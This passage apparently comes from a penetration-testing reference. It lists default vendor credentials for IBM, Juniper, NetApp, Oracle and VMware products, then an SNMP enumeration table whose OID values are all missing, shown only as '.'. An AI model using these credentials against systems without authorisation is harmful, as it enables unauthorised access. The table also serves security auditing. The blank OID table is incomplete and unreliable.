IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dbusr1, db2admin, iadmin, system, device, ufmcli, customer | PASSWORD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
Juniper | netscreen | netscreen |
NetApp | admin | netapp123 |
Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changme, ilom-admin, ilom-operator, welcome1, oracle |
VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
SNMP OID values⌗
OID | Value |
. | Hostname |
. | Domain name |
. | Usernames |
. | Running services |
. | Share information |